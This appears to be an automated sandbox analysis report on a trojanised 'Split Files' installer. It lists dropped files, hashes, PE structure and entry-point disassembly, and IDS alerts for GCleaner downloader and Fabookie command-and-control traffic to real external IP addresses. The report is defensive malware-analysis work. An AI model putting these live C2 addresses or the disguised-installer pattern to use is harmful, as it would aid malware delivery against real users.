                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4441 bytes, 927537\user, "C:\Program Files (x86)\Split Files"
                Category:dropped
                Size (bytes):4441
                Entropy (8bit):4.697339464808845
                Encrypted:false
                SSDEEP:48:kHED69yMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1DoDs:k7VZp8rD85pPmaoINFhqYOIhHeSk9WI
                MD5:35B9424FD3C02A2403561DA3E5D80E26
                SHA1:B944DC166C6A5BE77937B09B3E67175C422B4337
                SHA-256:B430632DBF9232BCC488DFD294297D1A197A832FB83333C6C601D7E41A587DBE
                SHA-512:1028FFD68185DA62C2A64B1D699733F89116AA8006CBB93B80609D675E02A80E9ACC2190E22F00CCE6B1F1168875354F855DBE750B67DC4DE8F2853FA9C8D0E7
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......Y...%..................................................................................................................`....r.............C....927537.user"C:\Program Files (x86)\Split Files.........../...P.. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):778752
                Entropy (8bit):6.357908612813808
                Encrypted:false
                SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                MD5:E8176050192FBB976D70238E3C121F4C
                SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
                SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
                SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.9318000564899
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:2094367
                MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
                SHA1:a109ebcf251a1e69923c60330994190e40ab466c
                SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
                SHA512:11f39030a9e5f5a095c85aa087fe949ed7e83e1a53a3df487baab09a38d5e744150a8d4e7b34eaec28678561861e640cb34231b893a7f38751f143d0ea1305d1
                SSDEEP:49152:XirWlOmsJ8sSNd3HEKBqd0yLaS1vNf+8UkqBx:XiClONJu3HEKBqd0yLaGFfvqH
                TLSH:9FA51232715472EEFCE369B0584F426D66236FB3A1A87E2E310A37365A61331F115F1A
                File Content Preview:MZP.....................@.......................Inno....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:b8ba6cc880e1f204
                Entrypoint:0x409820
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:e92b45c54aa05ec107d5ef90662e6b33
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007FC5F939961Bh
                call 00007FC5F939A8C6h
                call 00007FC5F939CAC9h
                call 00007FC5F939CB10h
                call 00007FC5F939F107h
                call 00007FC5F939F26Eh
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409F05h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409EBBh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007FC5F939FC5Fh
                call 00007FC5F939F81Eh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007FC5F939CF84h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007FC5F93996C7h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 00407158h
                call 00007FC5F939D66Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409E99h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007FC5F939D767h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007FC5F939D8A1h
                mov edx, esi
                mov ecx, 0000000Ch
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x8f0.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1f558.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x0.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000x8f940x9000False0.6195203993055556data6.591638965772245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa0000x2480x400False0.306640625data2.7093261929320986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xb0000xe640x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xc0000x8f00xa00False0.3953125data4.294209855544776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xd0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xe0000x180x200False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xf0000x8840x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0x100000x1f5580x1f600False0.37483659113545814data4.9335056025106585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_ICON0x1039c0x51f3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                RT_ICON0x155900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States
                RT_ICON0x25db80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States
                RT_ICON0x29fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                RT_ICON0x2c5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                RT_ICON0x2d6300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                RT_ICON0x2dfb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                RT_STRING0x2e4200x2f2data
                RT_STRING0x2e7140x30cdata
                RT_STRING0x2ea200x2cedata
                RT_STRING0x2ecf00x68data
                RT_STRING0x2ed580xb4data
                RT_STRING0x2ee0c0xaedata
                RT_GROUP_ICON0x2eebc0x68dataEnglishUnited States
                RT_VERSION0x2ef240x3a8dataEnglishUnited States
                RT_MANIFEST0x2f2cc0x289XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dllMessageBoxA
                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dllInitCommonControls
                advapi32.dllAdjustTokenPrivileges
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response8049706107.182.129.235192.168.2.5
                192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462TCP2041920ET TROJAN GCleaner Downloader Activity M84970580192.168.2.545.139.105.171
                192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287TCP2852981ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)4970680192.168.2.5107.182.129.235
                192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610TCP2852980ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)4970680192.168.2.5107.182.129.235
                TimestampSource PortDest PortSource IPDest IP
                Jan 5, 2023 08:47:09.771787882 CET4970580192.168.2.545.139.105.171
